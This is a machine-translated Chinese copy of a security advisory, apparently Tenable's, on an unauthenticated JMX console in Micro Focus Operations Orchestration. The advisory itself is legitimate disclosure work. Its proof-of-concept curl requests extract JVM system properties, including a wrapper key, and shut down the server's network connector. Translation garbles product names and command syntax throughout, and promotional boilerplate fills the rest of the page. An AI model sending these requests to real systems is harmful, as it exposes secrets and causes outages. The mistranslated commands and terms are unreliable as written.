脸谱网 Google + 推特 LinkedIn YouTube RSS 菜单 搜索 资源——博客 资源-网络研讨会 资源-报告 资源-事件 icons_066 icons_067 icons_068 icons_069 icons_070

(R1)微焦点操作编配信息披露和远程拒绝服务

剧情简介

操作的默认配置编排暴露了JMiniXJMX控制台未经身份验证的远程用户。恶意攻击者可以利用这个控制台收集信息:

albinolobster@ubuntu: ~ $ curl - d“执行= true”- x发布http://192.168.1.253:8080 oo / jminix /服务器/ 0 /域/ com.sun。管理/ mbean /类型= DiagnosticCommand /操作/ vmSystemProperties % 28% 29 / #结婚2018年2月28日11:01:57 EST java。供应商= Azul Systems inc .)的事件。持久性= false org.apache.xml.security。ignoreLineBreaks = true sun.java。发射器= SUN_STANDARD卡特琳娜。基础= C: \ /程序文件/惠普企业/ HPE操作编制/中心/ tomcat sun.management.compiler =热点64位分层的编译器卡特琳娜。10 sun.boot.class useNaming = true os.name = Windows。路径\ = C: \ \程序文件\ \企业\ \ HPE惠普业务编排\ \ java \ \ lib \ \ resources.jar; C: \ \ \程序文件\ \企业\ \ HPE惠普业务编排\ \ java \ \ lib \ \ rt.jar; C: \ \ \程序文件\ \企业\ \ HPE惠普业务编排\ \ java \ \ lib \ \ sunrsasign.jar; C: \ \ \程序文件\ \企业\ \ HPE惠普业务编排\ \ java \ \ lib \ \ jsse.jar; C: \ \ \程序文件\ \企业\ \ HPE惠普业务编排\ \ java \ \ lib \ \ jce.jar; C: \ \ \程序文件\ \企业\ \ HPE惠普业务编排\ \ java \ \ lib \ \ charsets.jar; C: \ \ \程序文件\ \企业\ \ HPE惠普业务编排\ \ java \ \ lib \ \ jfr.jar; C: \ \ \程序文件\ \企业\ \ HPE惠普业务编排\ \ java \ \类ssl。verifyHostName = false host.name = DESKTOP-F6M1S7H.westeros cloudslang.worker。inBufferCapacity = 200管理。url = http \: / / localhost \: 8080 / oo sun.desktop = windows java.vm.specification。供应商=甲骨文公司java.runtime.version = 1.8.0_66-b17包装。native_library =包装javax.net.ssl.keyStore = C: \ /程序文件/惠普企业/ HPE操作编制/中心/ var /安全/证书。p12包装。关键= mmvkDoBqly1UnneD13IinG_K5LF_5nhg user.name = DESKTOP-F6M1S7H $……剪断…

或简单地关闭网络接口:

albinolobster@ubuntu: ~ $ curl - d“执行= true”- x发布http://192.168.1.253:8080 oo / jminix /服务器/ 0 /域/卡特琳娜/ mbean /类型=连接器端口= 8080 /操作/停止% 29 /旋度:28%(52)从服务器albinolobster@ubuntu空回复:~ $ curl vv http://192.168.1.253:8080 oo / *尝试192.168.1.253……* TCP_NODELAY集*连接到192.168.1.253(192.168.1.253)端口8080 (# 0)> GET / oo / HTTP / 1.1 >主持人:192.168.1.253:8080 > user - agent:旋度/ 7.54.0 >接受:* / * > ^ C

注意在CVSS得分。微关注给了这样一个分数使用“交流:H”(或访问的复杂性:高)。描述为一个“低”访问的复杂性:

专门的访问条件或例外情况不存在。下面是例子:受影响的产品通常需要访问一个广泛的系统和用户,可能是匿名的,不可信的(例如,面向internet网络或邮件服务器)。——受影响的配置是违约或无处不在。——攻击可以手动执行,不需要多少技巧或额外的信息收集。——竞争条件是一个懒惰的(即。,它在技术上是一个种族但容易获胜)。
受影响的配置是默认配置。站不住脚的CVSS分数反映出,尽管微焦点”不。

解决方案

按照供应商的指导在这里

披露时间表

01/16/2017——发现问题
HPE 01/19/2017——脆弱性报告
01/30/2017——供应商确认收据和分配PSRT110353
03/31/2017 - Ping供应商更新
04/03/2017——供应商说”问题已被接受的产品所有者和过程”
PoC 07/11/2017——供应商请求
07/11/2017 - PoC站得住脚的提供
02/26/2018——供应商现在微焦点。他们问谁信贷。
02/26/2018——站得住脚的提供信用信息和要求披露日期。
02/26/2018 -供应商不确定信息披露日期,但将发送一个链接时可用
03/01/2018——供应商发布一个安全咨询
03/02/2018——站得住脚的发布一个安全咨询

交易报告内的所有信息提供了“是”,没有任何形式的保证,包括适销性的隐含保证和健身为特定目的,并没有保证的完整性、准确性、及时性。个人和组织负责评估任何实际或潜在的安全漏洞的影响。

站得住脚的非常重视产品安全。如果你认为你已经找到一个漏洞在一个我们的产品,我们要求您请与我们共同努力,快速解决它为了保护客户。站得住脚的相信迅速应对这样的报道,与研究人员保持沟通,并提供解决方案。

提交漏洞信息的更多细节,请参阅我们的漏洞报告指南页面。

如果你有问题或修正咨询,请电子邮件(电子邮件保护)

风险信息

Nessus插件ID: 107094年
成立咨询ID
- 2018 - 05
信贷

雅各布·贝恩斯

CVSSv2基地/时间的分数
7.8/6.8
CVSSv2向量
AV: N /交流:L /非盟:N / C: N /我:N / A: C
更多关键字
PSRT110353
受影响的产品
HPE业务编排10.70
10.60微焦点业务编排
风险因素

咨询时间

03-02-2018 - (R1)最初版本

站得住脚的脆弱性管理

以前Tenable.io


享受完全访问一个现代的、基于云的脆弱性管理平台,使您能够看到并追踪你所有的资产与无与伦比的精度。

你站得住脚的脆弱性管理试验Lumin还包括成立,成立网络应用扫描和站得住脚的云安全。

站得住脚的脆弱性管理

以前Tenable.io

享受完全访问一个现代的、基于云的脆弱性管理平台,使您能够看到并追踪你所有的资产与无与伦比的精度。今天购买你的年度订阅。

65年资产

选择你的订阅选项:

现在购买

尝试成立Nessus专业免费的

免费7天

站得住脚的Nessus是当今市场上最全面的漏洞扫描器。

新成立Nessus专家
现在可用

Nessus专家增添了更多的功能,包括外部攻击表面扫描,和添加域和扫描云基础设施的能力。点击这里尝试Nessus专家。

填写下面的表格继续Nessus Pro的审判。

买站得住脚的Nessus专业

站得住脚的Nessus是当今市场上最全面的漏洞扫描器。站得住脚的Nessus专业将帮助自动化漏洞扫描过程,节省时间在你的合规周期,让你与你的团队。

买一个多年的许可并保存。高级支持访问添加到手机、社区和聊天支持一天24小时,一年365天。

选择您的许可

买一个多年的许可并保存。

添加的支持和培训

Tenable.io

享受完全访问一个现代的、基于云的脆弱性管理平台,使您能够看到并追踪你所有的资产与无与伦比的精度。

你站得住脚的脆弱性管理试验Lumin还包括成立,成立网络应用扫描和站得住脚的云安全。

Tenable.io

享受完全访问一个现代的、基于云的脆弱性管理平台,使您能够看到并追踪你所有的资产与无与伦比的精度。今天购买你的年度订阅。

65年资产

选择你的订阅选项:

现在购买

尝试站得住脚的Web应用程序扫描

以前Tenable.ioWeb Application Scanning

享受完全访问我们的最新的web应用程序扫描提供专为现代应用程序的一部分的一个管理平台。安全扫描整个在线组合漏洞具有高精确度没有重体力工作或中断关键web应用程序。现在报名。

你站得住脚的Web应用程序扫描试验还包括站得住脚的脆弱性管理,成立Lumin站得住脚的云安全。

买站得住脚的Web应用程序扫描

以前Tenable.ioWeb Application Scanning

享受完全访问一个现代的、基于云的脆弱性管理平台,使您能够看到并追踪你所有的资产与无与伦比的精度。今天购买你的年度订阅。

5 fqdn

3578美元

现在购买

尝试成立Lumin

可视化和探索你的风险管理,跟踪风险降低随着时间的推移和基准与站得住脚的Lumin你的同行。

你站得住脚的Lumin审判还包括站得住脚的脆弱性管理,站得住脚的Web应用程序扫描和站得住脚的云安全。

买站得住脚的Lumin

联系销售代表如何站得住脚的Lumin可以帮助你了解你的整个组织和管理网络的风险。

尝试站得住脚的云安全

以前Tenable.cs

享受完全访问检测和修复云基础设施配置错误和查看运行时的漏洞。现在注册你的免费试用。了解更多关于审判过程请点击这里。

你站得住脚的云安全试验还包括站得住脚的脆弱性管理,成立Lumin和站得住脚的Web应用程序扫描。

联系销售代表购买站得住脚的云安全

联系销售代表来了解更多关于站得住脚的云安全,看是多么容易机载云账户和获得可见性都几分钟内云配置错误和漏洞。

尝试成立Nessus专家免费

免费7天

现代修建的攻击表面,Nessus专家使您能够看到更多和保护您的组织从漏洞从云。

已经成立Nessus专业吗?
升级到Nessus专家免费7天。

买站得住脚的Nessus专家

现代修建的攻击表面,Nessus专家使您能够看到更多和保护您的组织从漏洞从云。

选择您的许可

买一个多年的执照和存更多的钱。

添加的支持和培训

尝试Nessus专家免费

免费7天

现代修建的攻击表面,Nessus专家使您能够看到更多和保护您的组织从漏洞从云。

已经有了Nessus专业?
升级到Nessus专家免费7天。

买站得住脚的Nessus专家

现代修建的攻击表面,Nessus专家使您能够看到更多和保护您的组织从漏洞从云。

选择您的许可

买一个多年的执照和存更多的钱。

添加的支持和培训

Baidu
map